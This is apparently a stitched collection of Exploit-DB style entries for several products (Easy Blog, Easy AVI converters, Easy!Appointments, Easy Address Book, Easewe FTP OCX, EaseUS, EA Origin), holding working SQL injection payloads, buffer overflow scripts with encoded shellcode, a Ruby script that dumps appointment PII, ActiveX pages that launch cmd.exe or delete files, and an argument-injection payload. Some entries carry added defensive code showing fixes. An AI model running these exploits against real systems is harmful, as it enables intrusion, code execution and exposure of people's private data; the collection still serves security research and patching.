
# Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection
# Date: 2017-09-27
# Exploit Author: 8bitsec
# Vendor Homepage: https://www.codester.com/
# Software Link: https://www.codester.com/items/4616/easy-blog-php-script
# Version: 1.3a
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-27

Product & Service Introduction:
===============================
A simple and easy-to-set-up script that gives you your own basic blog, packed with professional features.

Technical Details & Description:
================================

SQL injection in the [id] parameter of article.php.

Proof of Concept (PoC):
=======================

SQLi:

http://localhost/[path]/article.php?id=8' AND 7160=7160 AND 'cbgz'='cbgz

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=8' AND 7160=7160 AND 'cbgz'='cbgz

==================
8bitsec - [https://twitter.com/_8bitsec]
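The payload above works because the value of `id` is spliced into the SQL text, so the injected `AND` predicates are evaluated by the database. The following is an added example, not code from the advisory or from Easy Blog PHP Script (whose schema is not shown; the `articles` table here is a constructed stand-in). It runs the advisory's exact payload against the vulnerable concatenation pattern and against a bound-parameter query, and adds the edge check a blog script should apply anyway: an article id is a positive integer, nothing else.

```python
import sqlite3
from typing import List, Optional

# The boolean-based blind payload from the advisory, exactly as given.
PAYLOAD = "8' AND 7160=7160 AND 'cbgz'='cbgz"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the blog's article table.

    The real schema of Easy Blog PHP Script is not shown in the advisory;
    table and column names here are assumptions for the demonstration.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO articles (id, title) VALUES (?, ?)",
        [(7, "Seventh post"), (8, "Eighth post"), (9, "Ninth post")],
    )
    return conn


def fetch_title_unsafe(conn: sqlite3.Connection, article_id: str) -> List[str]:
    """Vulnerable pattern: the request value becomes part of the SQL text,
    so the quote in the payload closes the literal and the rest is parsed
    as SQL (this is the shape the advisory reports for article.php)."""
    sql = f"SELECT title FROM articles WHERE id = '{article_id}'"
    return [row[0] for row in conn.execute(sql)]


def fetch_title_safe(conn: sqlite3.Connection, article_id: str) -> List[str]:
    """Hardened pattern: the value is bound as a parameter and can only ever
    be compared against the column, never parsed as SQL."""
    sql = "SELECT title FROM articles WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (article_id,))]


def parse_article_id(raw: str) -> Optional[int]:
    """Edge validation: an article id is a positive integer. Anything else
    is rejected before it reaches the database layer at all."""
    if not raw.isdigit():
        return None
    value = int(raw)
    return value if value > 0 else None


if __name__ == "__main__":
    db = make_db()
    print("unsafe, payload:", fetch_title_unsafe(db, PAYLOAD))  # injected predicate is evaluated
    print("safe, payload:  ", fetch_title_safe(db, PAYLOAD))    # payload is just a non-matching string
    print("validated id:   ", parse_article_id(PAYLOAD))        # None: rejected at the edge
```

Parameter binding alone closes the injection; the integer check on top of it turns a probe like this into a plain 400-style rejection, which is also a far better signal for logging than a query that silently returns the same row.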
            
#!/usr/bin/python
###########################################################################################
# Exploit Title      : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service #
# Exploit Author     : Hashim Jawad                                                       #
# Twitter            : @ihack4falafel                                                     # 
# Author Website     : ihack4falafel[.]com                                                #
# Vendor Homepage    : http://www.divxtodvd.net/index.htm                                 #
# Vulnerable Software: http://www.divxtodvd.net/easy_divx_to_dvd.exe                      #
# Tested on OS       : Windows XP professional SP3                                        #
#                      Windows 10 professional 64-bit                                     #
# Steps to reproduce : Add Evil.AVI and BOOM!                                             #
###########################################################################################

buffer = "A" * 500

try:
	f=open("Evil.AVI","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"
            
#!/usr/bin/python
 
###############################################################################
# Exploit Title:        Easy AVI DivX Converter 1.2.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date:                 24-08-2017
# Exploit Author:       Anurag Srivastava 
# Website:		www.pyramidcyber.com
# Vulnerable Software:  Easy AVI DivX Converter 
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.2.24
# Software Link:        http://www.divxtodvd.net/easy_avi_converter.exe
# Tested On:            Windows 7 x64 
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
 

buffer = "\x41" * 1008   
 
nSEH = "\xeb\x10\x90\x90"
 
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
 
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
 
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
 
nops = "\x90" * 16
 
badchars = "\x0a\x0d"
 
data = buffer + nSEH + SEH + nops + buf
 
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
            
# Exploit Title: Easy Appointments 1.4.2 - Information Disclosure
# Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
# Author website: https://pwn.by/noraj/
# Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482
# Date: 2022-04-11
# Vendor Homepage: https://easyappointments.org/
# Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz
# Version: < 1.4.3 (it means up to 1.4.2)
# Tested on: Easy!Appointments Version 1.3.2

# Vulnerability
## Discoverer: Francesco CARLUCCI
## Date: 2022-01-30
## Discoverer website: https://carluc.ci/
## Discovered on OpenNetAdmin 1.4.2
## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments
## CVE: CVE-2022-0482
## CWE: CWE-863
## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c
## References:
##   - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/
##   - https://github.com/alextselegidis/easyappointments/tree/1.4.2
##   - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml
##   - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/
##   - https://nvd.nist.gov/vuln/detail/CVE-2022-0482

#!/usr/bin/env ruby

require 'date'
require 'httpx'
require 'docopt'

doc = <<~DOCOPT
Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure

  Source: https://github.com/Acceis/exploit-CVE-2022-0482

  Usage:
    #{__FILE__} <url> [<startDate> <endDate>] [--debug]
    #{__FILE__} -h | --help

  Options:
    <url>       Root URL (base path) including HTTP scheme, port and root folder
    <startDate> All events since (default: 2015-01-11)
    <endDate>   All events until (default: today)
    --debug     Display arguments
    -h, --help  Show this screen

  Examples:
    #{__FILE__} http://10.0.0.1
    #{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30
DOCOPT

def fetch_csrf(root_url, http)
  vuln_url = "#{root_url}/index.php"

  http.get(vuln_url)
end

def exploit(root_url, startDate, endDate, http)
  vuln_url = "#{root_url}/index.php/backend_api/ajax_get_calendar_events"

  params = {
    'csrfToken' => http.cookies.first.value, # csrfCookie
    'startDate' => startDate.nil? ? '2015-01-11' : startDate,
    'endDate' => endDate.nil? ? Date.today.to_s : endDate
  }

  http.post(vuln_url, form: params)
end

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']

  http = HTTPX.plugin(:cookies)
  fetch_csrf(args['<url>'], http)
  puts exploit(args['<url>'], args['<startDate>'], args['<endDate>'], http).body
rescue Docopt::Exit => e
  puts e.message
end
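The exploit above needs nothing but a CSRF cookie obtained from `index.php`, echoed back as `csrfToken`: the endpoint checks anti-forgery state but never asks whether the caller is logged in, which is what CWE-863 describes. The following is an added example, not code from the exploit or from Easy!Appointments itself, modelling that gap and its fix in plain Python. The session cookie name `ea_session`, the role names and the appointment records are constructed assumptions for the demonstration; only the `csrfCookie`/`csrfToken` pair comes from the advisory.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple


@dataclass
class Request:
    """Minimal stand-in for an HTTP request: cookies and POST form fields."""
    cookies: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)


# Constructed server-side state (assumptions, not Easy!Appointments internals).
SESSIONS = {"s3ss10n-admin": {"user_id": 1, "role": "admin"}}
BACKEND_ROLES = {"admin", "provider", "secretary"}
APPOINTMENTS = [  # the PII the endpoint returns: constructed sample rows
    {"id": 1, "start": "2022-04-11 09:00", "customer": "Customer One", "email": "one@example.invalid"},
    {"id": 2, "start": "2022-04-12 14:30", "customer": "Customer Two", "email": "two@example.invalid"},
]


def csrf_ok(req: Request) -> bool:
    """Double-submit check: posted csrfToken must equal the csrfCookie value.
    This only defends against cross-site request forgery; it says nothing
    about who the caller is, since anyone can fetch the cookie from index.php."""
    token = req.form.get("csrfToken")
    return token is not None and token == req.cookies.get("csrfCookie")


def current_user(req: Request) -> Optional[dict]:
    return SESSIONS.get(req.cookies.get("ea_session", ""))


def get_calendar_events_vulnerable(req: Request) -> Tuple[int, object]:
    """Shape of the endpoint the advisory describes: the CSRF token is
    validated, the login state is not (incorrect authorization, CWE-863)."""
    if not csrf_ok(req):
        return 403, {"error": "invalid csrf token"}
    return 200, APPOINTMENTS


def get_calendar_events_fixed(req: Request) -> Tuple[int, object]:
    """Same endpoint with authentication and role checks in front of the data."""
    if not csrf_ok(req):
        return 403, {"error": "invalid csrf token"}
    user = current_user(req)
    if user is None:
        return 401, {"error": "authentication required"}
    if user["role"] not in BACKEND_ROLES:
        return 403, {"error": "insufficient privileges"}
    return 200, APPOINTMENTS


def anonymous_request() -> Request:
    """What the exploit sends: a csrfCookie from index.php echoed back as
    csrfToken, a date range, and no login session at all."""
    return Request(
        cookies={"csrfCookie": "abc123"},
        form={"csrfToken": "abc123", "startDate": "2015-01-11", "endDate": "2022-04-11"},
    )


def admin_request() -> Request:
    return Request(
        cookies={"csrfCookie": "abc123", "ea_session": "s3ss10n-admin"},
        form={"csrfToken": "abc123", "startDate": "2015-01-11", "endDate": "2022-04-11"},
    )


if __name__ == "__main__":
    print("vulnerable, anonymous:", get_calendar_events_vulnerable(anonymous_request())[0])  # 200
    print("fixed, anonymous:     ", get_calendar_events_fixed(anonymous_request())[0])       # 401
    print("fixed, admin:         ", get_calendar_events_fixed(admin_request())[0])           # 200
```

The order of the checks matters for detection as well as correctness: an anonymous caller with a valid CSRF token now produces a 401 on a backend API route, which is an easy thing to alert on, whereas the vulnerable version logs a perfectly ordinary 200.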
            
#!/usr/bin/python
# Exploit Title: Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow 
# Version:       1.6
# Date:          2015-08-23
# Author:        Tracy Turben (tracyturben@gmail.com)
# Software Link: http://www.efssoft.com/
# Tested on:     Win7x32-EN,Win7x64-EN


from struct import pack
import socket,sys
import os
  
host="192.168.1.15"
port=80
  
nopsled0 = "A" * 80 

EDX = pack('<L',0x1001AFB8) # 1001AFE0 - 28 = 1001AFB8  JG SHORT 1001AF91 to MOV EAX,EBX POP EBP POP EBX RETN Return to Shellcode   

nopsled1="\x90" * 20

extraroom = "\x90" * 780 
# windows/exec CMD=calc.exe 
# Encoder: x86/shikata_ga_nai
# bad characters '\x00\x0a\x0d'

shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
 
payload=nopsled0 + EDX + nopsled1 + shellcode + extraroom
 
buf="GET //addrbook.ghp? HTTP/1.1\r\n"
buf+="User-Agent: Mozilla/4.0\r\n"
buf+="Host:" + host + ":" + str(port) + "\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf+="Accept-Language: en-us\r\n"
buf+="Accept-Encoding: gzip, deflate\r\n"
buf+="Referer: http://" + host + "/\r\n"
buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
buf+="Conection: Keep-Alive\r\n\r\n"
  
print "[*] Connecting to Host " + host + "..."
 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((host, port))
    print "[*] Connected to " + host + "!"
except:
    print "[!] " + host + " didn't respond\n"
    sys.exit(0)
     
print "[*] Sending malformed request..."
s.send(buf)
 
print "[!] Exploit has been sent!\n"
s.close()
            
source: https://www.securityfocus.com/bid/48393/info

Easewe FTP OCX ActiveX control is prone to multiple insecure-method vulnerabilities.

Attackers can exploit these issues to perform unauthorized actions or execute arbitrary programs. Successful exploits may result in compromise of affected computers.

Easewe FTP OCX ActiveX control 4.5.0.9 is vulnerable; other versions may also be affected. 

1.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Execute arg1 ,arg2 ,arg3
End Sub
</script>
</html>

2.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Run arg1 ,arg2 ,arg3
End Sub
</script>
</html>

3.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_create"
target.CreateLocalFile arg1
End Sub

</script>
</html>

4.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="Directorypath\Directory"
target.CreateLocalFolder arg1
End Sub

</script>
</html>

5.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_delete"
target.DeleteLocalFile arg1
End Sub
</script>
</html>

<HTML>
Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
<br>
Description: There is an insecure method in the (LocalFileCreate) function<br>
Found By : coolkaveh<br>

<title>Exploited By : coolkaveh </title>
<BODY>
 <object id=cyber
classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>

<SCRIPT>

function Do_it()
 {
     File = "kaveh.txt"
   cyber.LocalFileCreate(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>
            
# Exploit Title: EaseUS Data Recovery - 'ensserver.exe'  Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2022-18-04
# Vendor Homepage: https://www.easeus.com/
# Tested Version: 15.1.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
EaseUS UPDATE SERVICE    EaseUS UPDATE SERVICE    C:\Program Files (x86)\EaseUS\ENS\ensserver.exe    Auto

C:\>sc qc "EaseUS UPDATE SERVICE"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: EaseUS UPDATE SERVICE
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EaseUS UPDATE SERVICE
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

Host Name:                 DESKTOP-HR3T34O
OS Name:                   Microsoft Windows 10 Home
OS Version:                10.0.19042 N/A Build 19042
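The `wmic | findstr` pipeline above is a manual version of a check worth automating during a build audit: parse each service's configuration and flag any image path that is unquoted and contains a space, noting the account it starts under. The following is an added example, not part of the advisory, that does exactly that over `sc qc` output. The first sample is the advisory's own `sc qc` block; the other two services are constructed for contrast (one correctly quoted, one under the Windows directory that the advisory's `findstr /v` filter excludes).

```python
import re
from typing import Dict, List, Tuple

# Constructed audit input: the advisory's `sc qc` output plus two constructed services.
SC_QC_OUTPUTS = [
    r"""
SERVICE_NAME: EaseUS UPDATE SERVICE
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EaseUS UPDATE SERVICE
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
""",
    r"""
SERVICE_NAME: ConstructedQuotedSvc
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Example Vendor\svc.exe" -run
        SERVICE_START_NAME : LocalSystem
""",
    r"""
SERVICE_NAME: ConstructedWindowsSvc
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Windows\Example Dir\tool.exe
        SERVICE_START_NAME : LocalSystem
""",
]


def parse_sc_qc(text: str) -> Dict[str, str]:
    """Turn `sc qc` output into a field map keyed by the upper-case field names.
    Lines without an upper-case key (e.g. "[SC] QueryServiceConfig SUCCESS") are skipped."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().isupper():
            fields[key.strip()] = value.strip()
    return fields


def image_path(binary_path: str) -> str:
    """Executable portion of BINARY_PATH_NAME: the quoted token if the path is
    quoted, otherwise everything up to and including the first '.exe'."""
    path = binary_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        return path[1:end] if end != -1 else path[1:]
    match = re.match(r"(.*?\.exe)", path, re.IGNORECASE)
    return match.group(1) if match else path


def is_unquoted_with_spaces(binary_path: str) -> bool:
    """True when the service manager has to guess where the executable name
    ends, i.e. the path is not quoted and the executable part contains a space."""
    path = binary_path.strip()
    return not path.startswith('"') and " " in image_path(path)


def audit_services(outputs: List[str], skip_windows_dir: bool = True) -> List[Tuple[str, str]]:
    """Return (service name, start account) for every service whose image path is
    unquoted and contains spaces. With skip_windows_dir the Windows directory is
    left out, mirroring the exclusion the advisory applies with findstr /v."""
    flagged: List[Tuple[str, str]] = []
    for text in outputs:
        fields = parse_sc_qc(text)
        path = fields.get("BINARY_PATH_NAME", "")
        if skip_windows_dir and image_path(path).lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_spaces(path):
            flagged.append((fields.get("SERVICE_NAME", "?"), fields.get("SERVICE_START_NAME", "?")))
    return flagged


if __name__ == "__main__":
    for name, account in audit_services(SC_QC_OUTPUTS):
        print(f"unquoted service path: {name} (runs as {account})")
```

A hit that also runs as LocalSystem with AUTO_START, as the EaseUS entry does, is the combination to prioritise; the remediation on the vendor side is simply to quote the path in the service registration.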
            
# Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit
# Date: 19.04.19
# Vendor Homepage:http://www.audiotool.net/download.htm
# Software Link:  http://www.audiotool.net/download/audioconverter.exe
# Exploit Author: Achilles
# Tested Version: 5.30
# Tested on: Windows 7 x64 Sp1

# 1.- Run the python script, it will create a new file with the name "Evil.mp4"
# 2.- Open AudioConverter.exe and Click Function and choose Audio Cutter
# 3.- Load the file "Evil.mp4"
# 4.- Click ok
# 5.- Click Cut
# 6.- And you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
	f=open("Evil.mp4","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"
            
# Exploit Title: EA Origin <10.5.38 Remote Code Execution
# Date: 05/22/2019
# Exploit Author: Dominik Penner (@zer0pwn)
# Vendor Homepage: https://www.origin.com
# Software Link: https://www.origin.com/can/en-us/store/download
# Version: 10.5.38 and below
# Tested on: Windows 7, Windows 8, Windows 10
# CVE : CVE-2019-12828

Electronic Arts' Origin Client for Windows, in versions 10.5.38 and below, is vulnerable to argument injection which, if leveraged properly, can ultimately yield remote code execution.

NOTE: THIS IS TO BE READ IN MARKDOWN (.MD) FORMAT

# 0x01 Introduction

Over the past month or so, I've spent quite a bit of time reading and experimenting with custom URI schemes. As the last post on this blog clearly demonstrated, a poorly implemented custom URI can have a number of security concerns. When I say "a number", it's because I'm about to bring a few more to light, using EA's Origin Client as our crash test dummy.

TL;DR: Another Origin RCE, unrelated to CVE-2019-11354.

# 0x02 Custom URI Schemes

In this demonstration, we're going to be using the Origin client. However, this vulnerability can be found in a number of other applications. This technique is hardly Origin specific. In order for us to fully understand how this exploit works, we need to understand how Windows treats custom URI schemes.

If we look for Origin's URI scheme in the registry, this is what we find.

[![](https://zeropwn.github.io/assets/origin_regedit.png "Origin Regedit")](https://zeropwn.github.io/assets/origin_regedit.png)

As we can see by this snippet, 

```
"C:\Program Files (x86)\Origin\Origin.exe" "%1"
```

whenever we call `origin://` or `origin2://`, Windows will use `ShellExecute()` to spawn the process and replace %1 with our input.

For example:

```
origin://game/launch
```

Spawns the Origin process with the following command line arguments:

```
C:\Program Files (x86)\Origin\Origin.exe "origin://game/launch"
```

If we RTFM a little bit and check out MSDN's documentation on registering custom URI schemes, we'll see that they point out some security issues. This is what they have to say:

"As noted above, the string that is passed to a pluggable protocol handler might be broken across multiple parameters. Malicious parties could use additional quote or backslash characters to pass additional command line parameters. For this reason, pluggable protocol handlers should assume that any parameters on the command line could come from malicious parties, and carefully validate them. Applications that could initiate dangerous actions based on external data must first confirm those actions with the user. In addition, handling applications should be tested with URIs that are overly long or contain unexpected (or undesirable) character sequences."

This basically means that the application should be responsible for making sure that there aren't any illegal characters or arguments injected via the crafted URI.
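To make the MSDN guidance concrete, the following added example (not code from the post, Origin, or Qt) reproduces how Windows turns the registry template into an argument vector and then shows the check a handler should run over its own `argv` before acting on the URI. The splitting routine follows the documented CommandLineToArgvW rules; `handler_accepts` is my suggested validation, not something Origin implements. Run against the post's own `-reverse` URI, the split shows the extra arguments appearing, and the check rejects them.

```python
from typing import List
from urllib.parse import urlsplit

# The handler command from the registry snippet above; Windows replaces %1 with the URI.
HANDLER_TEMPLATE = r'"C:\Program Files (x86)\Origin\Origin.exe" "%1"'


def split_windows_cmdline(cmdline: str) -> List[str]:
    """Split a command line the way CommandLineToArgvW / the MS C runtime do:
    whitespace separates arguments, a double quote toggles quoted mode, and
    backslashes are only special directly in front of a double quote
    (2n backslashes + quote -> n backslashes and a toggle; 2n+1 -> n backslashes
    and a literal quote). Written for this example; the CRT's special case for
    a doubled quote inside a quoted argument is not modelled."""
    args: List[str] = []
    current: List[str] = []
    in_quotes = False
    have_arg = False
    i, n = 0, len(cmdline)
    while i < n:
        ch = cmdline[i]
        if ch == "\\":
            j = i
            while j < n and cmdline[j] == "\\":
                j += 1
            count = j - i
            if j < n and cmdline[j] == '"':
                current.append("\\" * (count // 2))
                if count % 2:          # odd run: the quote is literal, consume it
                    current.append('"')
                    j += 1
            else:
                current.append("\\" * count)
            have_arg = True
            i = j
            continue
        if ch == '"':
            in_quotes = not in_quotes
            have_arg = True            # "" yields an empty argument
        elif ch in " \t" and not in_quotes:
            if have_arg:
                args.append("".join(current))
                current, have_arg = [], False
        else:
            current.append(ch)
            have_arg = True
        i += 1
    if have_arg:
        args.append("".join(current))
    return args


def launch_argv(uri: str, template: str = HANDLER_TEMPLATE) -> List[str]:
    """The argv the handler receives once Windows has substituted the URI for %1."""
    return split_windows_cmdline(template.replace("%1", uri))


def handler_accepts(argv: List[str], scheme: str = "origin") -> bool:
    """Handler-side check (suggested, not Origin's): exactly one URI argument,
    carrying the registered scheme, with no quotes, backslashes, whitespace or
    control characters. Anything else means the command line was tampered with."""
    if len(argv) != 2:
        return False
    uri = argv[1]
    if any(c in '"\\' or c.isspace() or ord(c) < 0x20 for c in uri):
        return False
    return urlsplit(uri).scheme.lower() == scheme


if __name__ == "__main__":
    for uri in ("origin://game/launch", 'origin://?" -reverse "'):
        argv = launch_argv(uri)
        print(f"{uri!r:32} -> argv={argv} accepted={handler_accepts(argv)}")
```

The second line of output is the post's Process Explorer screenshot in text form: the URI ends at the injected quote, `-reverse` becomes its own argument, and the trailing `""` leaves an empty fourth argument. A handler that insists on `len(argv) == 2` never gets as far as parsing the option.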

## A long history of URI-based exploits
As detailed in this blog post... argument injection via URI isn't new... at all. [https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62](https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62)

Some of these vulnerabilities can escape the "%1" argument by adding an unencoded `"` to the URI. For example, to inject arguments with CVE-2007-3670, all you had to do was get a remote user to visit your specially crafted iframe + URI, and the process would be spawned with the additional arguments injected.

```
firefoxurl://placeholder" --argument-injection
```

### Couldn't you just use command injection?

Because of the way ShellExecute gets called and passes the arguments, you cannot ultimately inject your own commands, only arguments.


# 0x03 Argument Injection

Due to the way that most applications (browsers, mail clients, etc) handle URIs, this becomes difficult to exploit in 2019. Modern browsers (Chrome, Firefox, Edge) will force encode certain characters when a link is handled. This obviously makes escaping the encapsulation difficult.

However, for custom URIs that don't have encapsulated arguments in the registry, you can easily just inject arguments with a space.

mIRC was recently vulnerable to this; to achieve RCE, the payload ended up being as simple as:

```
<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini'>
```

You can read more about how that exploit was discovered and exploited here:
[https://proofofcalc.com/cve-2019-6453-mIRC/](https://proofofcalc.com/cve-2019-6453-mIRC/)


Anyways, for this example with Origin, we're just going to spin up a fresh Windows 8 box and use IE11. We'll talk more about bypassing modern security mechanisms later.

## The Payload

So now that we've spun up our virtual machine, make sure you have Origin installed. Open a notepad, and paste the following:

```
<iframe src='origin://?" -reverse "'>
```

Open it in Internet Explorer, and allow Origin to launch (if it even prompts, lol). You should see the following.

[![](https://zeropwn.github.io/assets/origin_reverse.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_reverse.png)

